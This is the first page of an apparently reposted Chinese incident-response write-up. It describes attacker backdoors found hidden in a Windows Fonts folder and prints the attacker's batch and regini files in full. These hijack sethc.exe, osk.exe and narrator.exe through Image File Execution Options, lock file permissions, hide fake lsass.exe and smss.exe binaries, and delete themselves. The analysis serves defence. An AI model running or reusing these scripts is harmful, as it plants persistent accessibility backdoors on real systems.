歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

記一次應急中發現的詭異事件

來源:本站整理 作者:佚名 時間:2019-06-17 TAG: 我要投稿

0×1 事件概述
在一次應急響應中,無意發現來自不同地區和人員的攻擊,兩種留后門的方法,截然不同的操作,不同的技術手法。
0×2病毒的溫床Fonts
fonts目錄常被用于藏匿后門的最佳場所




由于不能直接使用資源管理器進行查看,所以我就選擇在dos下打印目錄結構進行查看。可以看到這個目錄下,有各種各樣的“非常規文件”
1.ini-6.ini文件的內容他們是:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [19]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe [19]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe [19]
然后我們繼續看該目錄下的其他文件
哦買噶的,這個老哥一定是個bat狂魔吧,為什么如此任性。
Aa.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$"
>>cloud.inf echo.
>>cloud.inf echo.[Registry Keys]
>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe", 0, "O:BA"
secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.log
del cloud.*
del %0
Aaa.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$">>cloud.inf echo.>>cloud.inf echo.[Registry Keys]>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe", 0, "O:BA"secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.logdel cloud.*del %0
aodd.bat
takeown /f %SystemRoot%\system32\osk.exe /a
echo y|cacls %SystemRoot%\system32\osk.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\osk.exe /e /g Users:r
echo y|cacls %SystemRoot%\system32\osk.exe /e /g Administrators:r
echo y|cacls %SystemRoot%\system32\osk.exe /e /d SERVICE
echo Y|cacls %SystemRoot%\system32\osk.exe /e /d "network service"
echo y|cacls %SystemRoot%\system32\osk.exe /e /g system:r
%systemroot%\system32\attrib +s +h +r %systemroot%\Fonts\lsass.exe
call %systemroot%\Fonts\Aa.bat
%systemroot%\system32\regini 3.ini
%systemroot%\regedit /s %systemroot%\Fonts\lsass.reg
del %systemroot%\Fonts\lsass.reg
call %systemroot%\Fonts\Ss.bat
%systemroot%\system32\regini 4.ini
del 3.ini
del 4.ini
@del %sfxcmd%
@del "%0" >nul
aodi.bat
takeown /f %SystemRoot%\system32\sethc.exe /a
echo y|cacls %SystemRoot%\system32\sethc.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g Users:r
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g Administrators:r
echo y|cacls %SystemRoot%\system32\sethc.exe /e /d SERVICE
echo Y|cacls %SystemRoot%\system32\sethc.exe /e /d "network service"
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g system:r
@echo cd c\:
%systemroot%\system32\attrib +s +h +r %systemroot%\Fonts\smss.exe
call %systemroot%\Fonts\AS.bat
%systemroot%\system32\regini 1.ini
%systemroot%\regedit /s %systemroot%\Fonts\smss.reg
del %systemroot%\Fonts\smss.reg
call %systemroot%\Fonts\SY.bat
%systemroot%\system32\regini 2.ini
del 1.ini
del 2.ini
@del %sfxcmd%
@del "%0" >nul
AS.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$"
>>cloud.inf echo.
>>cloud.inf echo.[Registry Keys]
>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe", 0, "O:BA"
secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.log
del cloud.*
del %0
sql.bat
takeown /f %SystemRoot%\system32\narrator.exe /a
echo y|cacls %SystemRoot%\system32\narrator.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\narrator.exe /e /g Users:r

[1] [2] [3] [4]  下一頁

【聲明】:黑吧安全網(http://www.zjtpzs.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        神秘东方电子游艺